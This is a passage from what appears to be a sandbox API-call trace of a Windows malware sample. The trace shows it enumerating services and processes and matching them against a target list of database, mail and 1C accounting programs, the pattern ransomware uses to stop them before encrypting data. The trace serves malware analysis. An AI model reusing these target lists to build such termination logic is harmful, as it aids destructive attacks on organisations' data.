	[0158.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0158.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0158.879] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0158.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0158.879] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0158.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0158.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0158.879] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0158.880] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0158.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0158.880] lstrlenW (lpString="lmhosts") returned 7
	[0158.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0158.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0158.880] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0158.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0158.880] lstrlenW (lpString="MMCSS") returned 5
	[0158.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0158.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0158.880] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0158.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0158.880] lstrlenW (lpString="MpsSvc") returned 6
	[0158.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0158.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0158.880] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0158.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0158.880] lstrlenW (lpString="netprofm") returned 8
	[0158.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0158.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0158.880] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0158.880] lstrlenW (lpString="NlaSvc") returned 6
	[0158.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0158.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0158.880] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0158.881] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0158.881] lstrlenW (lpString="nsi") returned 3
	[0158.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0158.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0158.881] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0158.881] lstrlenW (lpString="PcaSvc") returned 6
	[0158.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0158.881] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0158.881] lstrlenW (lpString="PlugPlay") returned 8
	[0158.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0158.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0158.881] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0158.881] lstrlenW (lpString="Power") returned 5
	[0158.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0158.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0158.881] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0158.881] lstrlenW (lpString="ProfSvc") returned 7
	[0158.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0158.881] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0158.882] lstrlenW (lpString="RpcEptMapper") returned 12
	[0158.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0158.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0158.882] lstrlenW (lpString="RpcSs") returned 5
	[0158.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0158.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0158.882] lstrlenW (lpString="SamSs") returned 5
	[0158.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0158.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0158.882] lstrlenW (lpString="Schedule") returned 8
	[0158.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0158.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0158.882] lstrlenW (lpString="SENS") returned 4
	[0158.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0158.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0158.882] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0158.882] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0158.883] lstrlenW (lpString="ShellHWDetection") returned 16
	[0158.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0158.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0158.883] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0158.883] lstrlenW (lpString="Spooler") returned 7
	[0158.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0158.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0158.883] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0158.883] lstrlenW (lpString="SysMain") returned 7
	[0158.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0158.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0158.883] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0158.883] lstrlenW (lpString="Themes") returned 6
	[0158.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0158.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0158.883] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0158.883] lstrlenW (lpString="TrkWks") returned 6
	[0158.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0158.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0158.883] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0158.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0158.884] lstrlenW (lpString="UxSms") returned 5
	[0158.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0158.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0158.884] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0158.884] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0158.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0158.884] lstrlenW (lpString="Winmgmt") returned 7
	[0158.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0158.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0158.884] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0158.884] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0158.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0158.884] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0158.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388
	[0158.886] Process32FirstW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0158.886] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0158.887] lstrlenW (lpString="System") returned 6
	[0158.887] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0158.887] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0158.887] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0158.887] lstrlenW (lpString="smss.exe") returned 8
	[0158.887] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0158.887] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0158.888] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0158.888] lstrlenW (lpString="csrss.exe") returned 9
	[0158.888] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0158.888] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0158.888] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0158.888] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0158.888] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0158.888] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0158.888] lstrlenW (lpString="wininit.exe") returned 11
	[0158.888] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0158.888] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0158.889] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0158.889] lstrlenW (lpString="csrss.exe") returned 9
	[0158.889] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0158.889] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0158.889] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0158.889] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0158.889] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0158.889] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0158.889] lstrlenW (lpString="winlogon.exe") returned 12
	[0158.889] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0158.889] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0158.890] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0158.890] lstrlenW (lpString="services.exe") returned 12
	[0158.890] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0158.890] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0158.890] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0158.890] lstrlenW (lpString="lsass.exe") returned 9
	[0158.890] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0158.891] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0158.891] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0158.891] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0158.891] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0158.891] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0158.891] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0158.891] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0158.891] lstrlenW (lpString="lsm.exe") returned 7
	[0158.891] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0158.891] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0158.891] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0158.891] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.892] lstrlenW (lpString="svchost.exe") returned 11
	[0158.892] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.892] lstrlenW (lpString="svchost.exe") returned 11
	[0158.892] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.892] lstrlenW (lpString="svchost.exe") returned 11
	[0158.892] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.893] lstrlenW (lpString="svchost.exe") returned 11
	[0158.893] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.893] lstrlenW (lpString="svchost.exe") returned 11
	[0158.893] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0158.893] lstrlenW (lpString="audiodg.exe") returned 11
	[0158.893] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.894] lstrlenW (lpString="svchost.exe") returned 11
	[0158.894] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.894] lstrlenW (lpString="svchost.exe") returned 11
	[0158.894] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0158.894] lstrlenW (lpString="spoolsv.exe") returned 11
	[0158.894] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0158.895] lstrlenW (lpString="svchost.exe") returned 11
	[0158.895] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0158.895] lstrlenW (lpString="taskhost.exe") returned 12
	[0158.895] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0158.895] lstrlenW (lpString="userinit.exe") returned 12
	[0158.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0158.896] lstrlenW (lpString="dwm.exe") returned 7
	[0158.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0158.896] lstrlenW (lpString="explorer.exe") returned 12
	[0158.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0158.896] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0158.897] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0158.897] lstrlenW (lpString="reader_sl.exe") returned 13
	[0158.897] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0158.897] CloseHandle (hObject=0x388) returned 1
	[0158.897] Sleep (dwMilliseconds=0x1f4) 
	[0159.439] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616e68
